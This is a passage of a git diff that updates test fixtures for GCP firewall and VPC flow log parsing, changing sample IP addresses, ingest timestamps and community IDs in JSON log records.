"{\"insertId\":\"1sdfuwxfk8hq1b\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":44668},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.551617516Z\"}", "kind": "event", "action": "firewall-rule", "id": "1sdfuwxfk8hq1b", @@ -1826,16 +1793,16 @@ "city_name": "Almelo", "region_name": "Overijssel" }, - "address": "192.0.2.7", + "address": "192.168.2.7", "port": 1683, - "ip": "192.0.2.7" + "ip": "192.168.2.7" }, "tags": [ "preserve_original_event" ], "network": { "name": "windows-isolated", - "community_id": "1:nptqbsyCEhZhJ1ZBfy4iEMDFucI=", + "community_id": "1:FnXfTcArp/LffPC0tx64B4rTV6E=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1854,7 +1821,7 @@ }, "related": { "ip": [ - "192.0.2.7", + "192.168.2.7", "10.42.0.2" ] }, @@ -1894,8 +1861,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147502100Z", - "original": "{\"insertId\":\"yot1ojetjdiw\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.0.2.7\",\"src_port\":1683},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"city\":\"Almelo\",\"continent\":\"Europe\",\"country\":\"nld\",\"region\":\"Overijssel\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:28.477733837Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:15.771161946Z\"}", + "ingested": "2021-12-09T13:37:43.705611400Z", + "original": "{\"insertId\":\"yot1ojetjdiw\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.168.2.7\",\"src_port\":1683},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"city\":\"Almelo\",\"continent\":\"Europe\",\"country\":\"nld\",\"region\":\"Overijssel\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:28.477733837Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:15.771161946Z\"}", "kind": "event", "action": "firewall-rule", "id": "yot1ojetjdiw", @@ -1921,17 +1888,17 @@ "continent_name": "America", "country_name": "usa" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 45068, "domain": "test-kibana", - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:+KvUpcdGASPCZ5QYcOHVgid9Yjg=", + "community_id": "1:/ut7lWVheWNhh3UrQNn/8O2iPS0=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1950,7 +1917,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.42.0.10" ] }, @@ -2002,8 +1969,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147506200Z", - "original": "{\"insertId\":\"5a27u1g22jks9e\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":45068},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.850729583Z\"}", + "ingested": "2021-12-09T13:37:43.705617Z", + "original": "{\"insertId\":\"5a27u1g22jks9e\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":45068},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.850729583Z\"}", "kind": "event", "action": "firewall-rule", "id": "5a27u1g22jks9e", @@ -2029,17 +1996,17 @@ "continent_name": "America", "country_name": "usa" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 45062, "domain": "test-kibana", - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:v6u3NIKBcvTUebkWUOly9nrN/HE=", + "community_id": "1:59vjEXNOC6W+KGAxHCndM//owm0=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -2058,7 +2025,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.42.0.10" ] }, @@ -2110,8 +2077,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147510100Z", - "original": "{\"insertId\":\"5a27u1g22jks8t\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":45062},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.85023465Z\"}", + "ingested": "2021-12-09T13:37:43.705622700Z", + "original": "{\"insertId\":\"5a27u1g22jks8t\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":45062},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.85023465Z\"}", "kind": "event", "action": "firewall-rule", "id": "5a27u1g22jks8t", @@ -2215,7 +2182,7 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147513900Z", + "ingested": "2021-12-09T13:37:43.705628300Z", "original": "{\"insertId\":\"1dobeotg13df9f5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.42.0.10\",\"src_port\":57794},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", diff --git a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log index 6e27f806daa..9d9cf86c8df 100644 --- a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log +++ b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log @@ -1,296 +1,296 @@ -{"insertId":"ut8lbrffooxyw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.12","dest_port":33478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxzb","jsonPayload":{"bytes_sent":"173663","connection":{"dest_ip":"10.87.40.76","dest_port":33970,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"68","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxze","jsonPayload":{"bytes_sent":"155707","connection":{"dest_ip":"203.0.113.134","dest_port":33576,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821143836Z","packets_sent":"78","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyz","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.0.2.23","dest_port":59679,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz6","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.0.2.117","dest_port":50646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxzf","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":50646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz1","jsonPayload":{"bytes_sent":"186151","connection":{"dest_ip":"10.87.40.76","dest_port":33692,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyp","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"92","reporter":"SRC","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxzd","jsonPayload":{"bytes_sent":"250864","connection":{"dest_ip":"10.87.40.76","dest_port":33554,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz8","jsonPayload":{"bytes_sent":"167939","connection":{"dest_ip":"10.87.40.76","dest_port":33880,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"63","reporter":"DEST","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyt","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.0.2.23","src_port":59679},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz5","jsonPayload":{"bytes_sent":"11773","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"94","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxza","jsonPayload":{"bytes_sent":"65699","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"356","reporter":"DEST","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyq","jsonPayload":{"bytes_sent":"66029","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 